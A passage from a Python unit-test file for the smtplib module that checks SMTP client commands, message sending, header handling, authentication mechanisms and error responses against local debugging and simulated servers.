if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
